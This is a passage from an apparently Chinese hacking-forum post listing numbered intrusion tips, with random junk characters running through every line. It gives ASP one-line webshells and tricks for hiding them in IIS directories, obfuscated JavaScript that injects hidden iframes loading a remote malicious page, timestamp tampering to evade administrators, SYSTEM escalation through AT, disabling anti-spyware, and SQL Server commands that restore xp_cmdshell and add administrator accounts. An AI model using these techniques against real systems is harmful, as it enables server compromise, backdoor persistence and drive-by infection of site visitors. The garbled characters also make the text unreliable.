3 ~* P% Q( `4 R, B% s* if).<%if request("cmd")<>"" then execute request("pass")%>
* y  T' D7 X2 N: [
5 x4 _3 x4 m. ?% b' B) y52、at "12:17" /interactive cmd7 }! z9 W9 N" J( X
执行后可以用AT命令查看新加的任务
# j/ g* Q+ D. n2 |0 A用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
- Z$ t* _- S" [: L* }" M5 F- {% V6 W6 B
53、隐藏ASP后门的两种方法
2 Z( @0 {& }. y1、建立非标准目录:mkdir images..\
4 k/ T* ]6 O2 P( d拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
- ]# I6 s8 Q, M% w; W通过web访问ASP木马:http://ip/images../news.asp?action=login
- {5 D4 P$ M, i如何删除非标准目录:rmdir images..\ /s6 p/ [9 [% s7 k) t
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
, F! i6 o, N* {3 c! [- hmkdir programme.asp
6 b: Z$ S5 j; Q  Y新建1.txt文件内容:<!--#include file=”12.jpg”-->
* E# R5 e" c7 C新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 M3 o0 L* r+ ~- j6 ?attrib +H +S programme.asp
3 l6 k  P4 b& \* e5 y; E0 n5 k通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt8 _. |3 T  `* [/ v6 V: l, [
& c; O2 i* ^1 D, Y- w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" ?9 u* d+ E; W1 c. p9 G
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。- f' E/ Y0 @- w% @3 L# L3 D
, q6 U2 Z( z% W2 \/ r( L  W( e; l1 g
55、JS隐蔽挂马
! g, G  L) Z6 c5 A  B1.
$ ?# @& q9 y& Wvar tr4c3="<iframe src=ht";, a$ y. I$ b9 B& a. i* M# |
tr4c3 = tr4c3+"tp:/";/ }! \) W) o- t+ w' i0 m! d+ }
tr4c3 = tr4c3+"/ww";+ |& U$ {2 q# ~1 G2 E+ H+ F
tr4c3 = tr4c3+"w.tr4";% M) a" h- [' Q3 I  s* r* _
tr4c3 = tr4c3+"c3.com/inc/m";
( x: G& H0 C, V. u. X8 U7 jtr4c3 = tr4c3+"m.htm style="display:none"></i";
; c5 Q) t' S  A' M9 H+ wtr4c3 =tr4c3+"frame>'";
6 l& }, Y  ]: Z# o/ Q# ^document.write(tr4c3);
$ B/ x, h" {- w& [- E) h避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ S. }" {8 `' \8 b/ y+ ?& V
; e; _; {' w$ h  _* W2.0 c0 Y* I5 {: u; _
转换进制,然后用EVAL执行。如; i( b1 ?2 M7 k$ i- ~4 ~
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; y1 I. |7 T5 }" g
不过这个有点显眼。
6 B3 v7 }1 U7 L% n) ^3.
2 P4 y6 Q: }# N0 Udocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');8 h5 g" ^" j9 A1 y; x: w
最后一点,别忘了把文件的时间也修改下。
1 G* M6 ^/ ?" h7 e& u# N4 Q
! ?* d* x( _8 l0 k56.3389终端入侵常用DOS命令3 ?- }; w0 N3 e( O% ^
taskkill taskkill /PID 1248 /t
& `* D$ A0 n6 Z2 \+ h! _& G
: N: V, |& n8 ^tasklist 查进程/ p  ~& v& K3 l; g# E. c7 {0 {

8 ^6 M: s: t) G2 t6 H9 B4 ecacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
& l& {$ k" s/ niisreset /reboot6 G' d3 f5 t1 w, i! x
tsshutdn /reboot /delay:1    重起服务器
1 j5 m! V4 }$ e1 n
" o  Z1 g( F5 F4 plogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,* t! n6 S' `, ^0 Q$ k

, _8 d$ W! M( E8 ]& f5 j5 vquery user 查看当前终端用户在线情况
/ Y% u2 q5 S, H
: Y7 |8 e7 W! f& Y$ P3 G/ b要显示有关所有会话使用的进程的信息,请键入:query process *
, i7 }2 ~# i3 G6 S1 w0 I/ ]! X: B
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:27 c! i* J9 P4 Z7 [  S
+ M* N7 B/ K* L5 h6 P1 \' X- r/ o
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER28 x; V* E# _( d* J9 u
7 G% }2 U9 U5 {3 k2 x$ [
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02% ]* |; W# z; t/ J7 t5 s
# K) ^1 n" i+ M; F  B* f# |$ u; k
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
- m% ?7 _7 s( y2 k2 h! z
0 j6 N# _; y" ^7 x命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统+ E* _$ n- d0 {, Z
$ I# P( F3 T6 M' D+ ]- ~
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" b' E$ A7 N3 K% m/ {& }' R' N: ~* u( e% c( N9 t. T
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机" c! W1 ?/ E. m! f

9 P' v6 e0 g' q; H56、在地址栏或按Ctrl+O,输入:" ?+ @* `) @  y4 }' w1 v( |) M
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;3 s* j+ h. y3 b. M3 _& f% T

$ j6 E) X: q8 V0 @5 {2 H* }6 L2 x源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
+ _& ^  P% G& b1 c) k* F9 \
& B& l1 ]$ ^$ u8 \57、net user的时候,是不能显示加$的用户,但是如果不处理的话,, k! Q! \: N8 S# G
用net localgroup administrators是可以看到管理组下,加了$的用户的。
+ V) I/ {! X/ K! x) ]% }
8 V* t& |. C- j( \: z! x$ k58、 sa弱口令相关命令
. i# c4 W. M; [" q+ W- h: S0 |3 P6 {. o) i; p4 i: E
一.更改sa口令方法:! x- V; F2 \& @
用sql综合利用工具连接后,执行命令:* n' C' c& o, v" ?
exec sp_password NULL,'20001001','sa': G1 h8 I8 g1 ], {  F* p( E3 [
(提示:慎用!)3 Z9 C( y: o4 ?
, s! Z' f6 T" S6 E. U
二.简单修补sa弱口令.  Z. c  t: E  ]3 S1 q

5 W/ M' S$ L8 _方法1:查询分离器连接后执行:
2 @2 N/ ?7 @$ bif exists (select * from$ {: S" V  R  s
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and9 D" s$ p, Y/ l( V) v
OBJECTPROPERTY(id, N'IsExtendedProc') = 1). {& p5 ]' z$ a0 c

; c8 r  V  ^. \7 Wexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
% `1 w, d% l0 q
3 S* c/ q, Y; EGO) G6 R" W! g$ {: d7 l. D

! c! K& A  U" t# Z然后按F5键命令执行完毕/ i! H' Z1 F: f- ^7 z6 z# f' `

7 m5 @  ?4 O% m1 b/ v方法2:查询分离器连接后
( n* A  X) D( {8 a第一步执行:use master( s* J4 F3 G2 i) ~# R4 B" m5 T! \) L
第二步执行:sp_dropextendedproc 'xp_cmdshell'
6 J+ G  W0 t& R, ~1 P然后按F5键命令执行完毕  V! a! q/ a' r' p

8 Q6 N+ k* n# d- X7 j
& H* d- I$ u* m; F三.常见情况恢复执行xp_cmdshell.
  q( U9 ?) ~6 A5 e9 ~$ |! O- {2 }  P. @9 Y5 `9 Y3 N
2 U! X* B+ L) j' {; D
1 未能找到存储过程'master..xpcmdshell'.! H) t/ L& x0 \4 S; U+ X% @, Z
   恢复方法:查询分离器连接后,) p( i% X; ?4 m  l
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
. v# S& ?& s: B. U第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ c. N/ ~1 Y' W! s, K  ~$ w然后按F5键命令执行完毕8 y8 ], ~* q) w- ~/ C9 I! F! u; P
5 l( ~' ~6 w& h; D- |: u; p7 F
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- g( u9 D  Y9 d* L恢复方法:查询分离器连接后,0 o# o8 G* I7 |- i
第一步执行:sp_dropextendedproc "xp_cmdshell"
5 D) n0 {, S: o1 o1 i第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, r* ~  X* F1 h7 E8 L然后按F5键命令执行完毕
/ _/ P' }) E# a
7 i" x- k: m# i2 H. a2 S3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
8 I! ?3 e: L/ `! E, U# I6 _恢复方法:查询分离器连接后,; j( q2 d1 ~' D1 i% Q9 M$ \0 y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: w- a! m  }/ {# n) `第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
7 [2 E3 Y( s$ V0 J. A/ p然后按F5键命令执行完毕. r$ e1 t$ \+ ~( S
! K/ K. {  J* E, I$ r
四.终极方法." E5 x+ b4 S3 E; ?; ~
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:( k) h4 w: S) y" l* W. i; @
查询分离器连接后,
6 Y+ x% u/ ~  |, Y2 G' W; x9 i! E( h2000servser系统:
: @5 n, v3 O5 P- c, M( Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: x- [& O( m# _) [8 [, M4 D1 y% i4 S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. @* _0 G2 ]* |
: g4 N7 t) T4 o) U! T. a$ Cxp或2003server系统:+ ]/ X8 b8 q: u$ g; X
5 j. l$ M  V: Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add', o  W/ v4 G. ]4 J
6 ?# V) b2 `/ _1 x! n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 I% ]8 k# |) R



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2